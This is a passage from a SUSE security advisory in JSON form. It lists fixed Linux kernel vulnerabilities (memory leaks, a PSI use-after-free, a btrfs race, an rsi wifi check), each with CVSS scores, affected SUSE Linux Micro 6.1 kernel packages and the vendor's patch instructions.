"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54016"
},
{
"cve": "CVE-2023-54017",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54017"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: fix possible memory leak in ibmebus_bus_init()\n\nIf device_register() returns error in ibmebus_bus_init(), name of kobject\nwhich is allocated in dev_set_name() called in device_add() is leaked.\n\nAs comment of device_add() says, it should call put_device() to drop\nthe reference count that was set in device_initialize() when it fails,\nso the name can be freed in kobject_cleanup().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54017",
"url": "https://www.suse.com/security/cve/CVE-2023-54017"
},
{
"category": "external",
"summary": "SUSE Bug 1255605 for CVE-2023-54017",
"url": "https://bugzilla.suse.com/1255605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54017"
},
{
"cve": "CVE-2023-54019",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54019"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/psi: use kernfs polling functions for PSI trigger polling\n\nDestroying psi trigger in cgroup_file_release causes UAF issues when\na cgroup is removed from under a polling process. This is happening\nbecause cgroup removal causes a call to cgroup_file_release while the\nactual file is still alive. Destroying the trigger at this point would\nalso destroy its waitqueue head and if there is still a polling process\non that file accessing the waitqueue, it will step on the freed pointer:\n\ndo_select\n vfs_poll\n do_rmdir\n cgroup_rmdir\n kernfs_drain_open_files\n cgroup_file_release\n cgroup_pressure_release\n psi_trigger_destroy\n wake_up_pollfree(\u0026t-\u003eevent_wait)\n// vfs_poll is unblocked\n synchronize_rcu\n kfree(t)\n poll_freewait -\u003e UAF access to the trigger\u0027s waitqueue head\n\nPatch [1] fixed this issue for epoll() case using wake_up_pollfree(),\nhowever the same issue exists for synchronous poll() case.\nThe root cause of this issue is that the lifecycles of the psi trigger\u0027s\nwaitqueue and of the file associated with the trigger are different. Fix\nthis by using kernfs_generic_poll function when polling on cgroup-specific\npsi triggers. It internally uses kernfs_open_node-\u003epoll waitqueue head\nwith its lifecycle tied to the file\u0027s lifecycle. This also renders the\nfix in [1] obsolete, so revert it.\n\n[1] commit c2dbe32d5db5 (\"sched/psi: Fix use-after-free in ep_remove_wait_queue()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54019",
"url": "https://www.suse.com/security/cve/CVE-2023-54019"
},
{
"category": "external",
"summary": "SUSE Bug 1255636 for CVE-2023-54019",
"url": "https://bugzilla.suse.com/1255636"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54019"
},
{
"cve": "CVE-2023-54022",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54022"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix potential memory leaks at error path for UMP open\n\nThe allocation and initialization errors at alloc_midi_urbs() that is\ncalled at MIDI 2.0 / UMP device are supposed to be handled at the\ncaller side by invoking free_midi_urbs(). However, free_midi_urbs()\nloops only for ep-\u003enum_urbs entries, and since ep-\u003enum_entries wasn\u0027t\nupdated yet at the allocation / init error in alloc_midi_urbs(), this\nentry won\u0027t be released.\n\nThe intention of free_midi_urbs() is to release the whole elements, so\nchange the loop size to NUM_URBS to scan over all elements for fixing\nthe missed releases.\n\nAlso, the call of free_midi_urbs() is missing at\nsnd_usb_midi_v2_open(). Although it\u0027ll be released later at\nreopen/close or disconnection, it\u0027s better to release immediately at\nthe error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54022",
"url": "https://www.suse.com/security/cve/CVE-2023-54022"
},
{
"category": "external",
"summary": "SUSE Bug 1255545 for CVE-2023-54022",
"url": "https://bugzilla.suse.com/1255545"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54022"
},
{
"cve": "CVE-2023-54023",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54023"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race between balance and cancel/pause\n\nSyzbot reported a panic that looks like this:\n\n assertion failed: fs_info-\u003eexclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED, in fs/btrfs/ioctl.c:465\n ------------[ cut here ]------------\n kernel BUG at fs/btrfs/messages.c:259!\n RIP: 0010:btrfs_assertfail+0x2c/0x30 fs/btrfs/messages.c:259\n Call Trace:\n \u003cTASK\u003e\n btrfs_exclop_balance fs/btrfs/ioctl.c:465 [inline]\n btrfs_ioctl_balance fs/btrfs/ioctl.c:3564 [inline]\n btrfs_ioctl+0x531e/0x5b30 fs/btrfs/ioctl.c:4632\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl fs/ioctl.c:856 [inline]\n __x64_sys_ioctl+0x197/0x210 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe reproducer is running a balance and a cancel or pause in parallel.\nThe way balance finishes is a bit wonky, if we were paused we need to\nsave the balance_ctl in the fs_info, but clear it otherwise and cleanup.\nHowever we rely on the return values being specific errors, or having a\ncancel request or no pause request. If balance completes and returns 0,\nbut we have a pause or cancel request we won\u0027t do the appropriate\ncleanup, and then the next time we try to start a balance we\u0027ll trip\nthis ASSERT.\n\nThe error handling is just wrong here, we always want to clean up,\nunless we got -ECANCELLED and we set the appropriate pause flag in the\nexclusive op. With this patch the reproducer ran for an hour without\ntripping, previously it would trip in less than a few minutes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54023",
"url": "https://www.suse.com/security/cve/CVE-2023-54023"
},
{
"category": "external",
"summary": "SUSE Bug 1256301 for CVE-2023-54023",
"url": "https://bugzilla.suse.com/1256301"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54023"
},
{
"cve": "CVE-2023-54025",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54025"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rsi: Do not configure WoWlan in shutdown hook if not enabled\n\nIn case WoWlan was never configured during the operation of the system,\nthe hw-\u003ewiphy-\u003ewowlan_config will be NULL. rsi_config_wowlan() checks\nwhether wowlan_config is non-NULL and if it is not, then WARNs about it.\nThe warning is valid, as during normal operation the rsi_config_wowlan()\nshould only ever be called with non-NULL wowlan_config. In shutdown this\nrsi_config_wowlan() should only ever be called if WoWlan was configured\nbefore by the user.\n\nAdd checks for non-NULL wowlan_config into the shutdown hook. While at it,\ncheck whether the wiphy is also non-NULL before accessing wowlan_config .\nDrop the single-use wowlan_config variable, just inline it into function\ncall.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
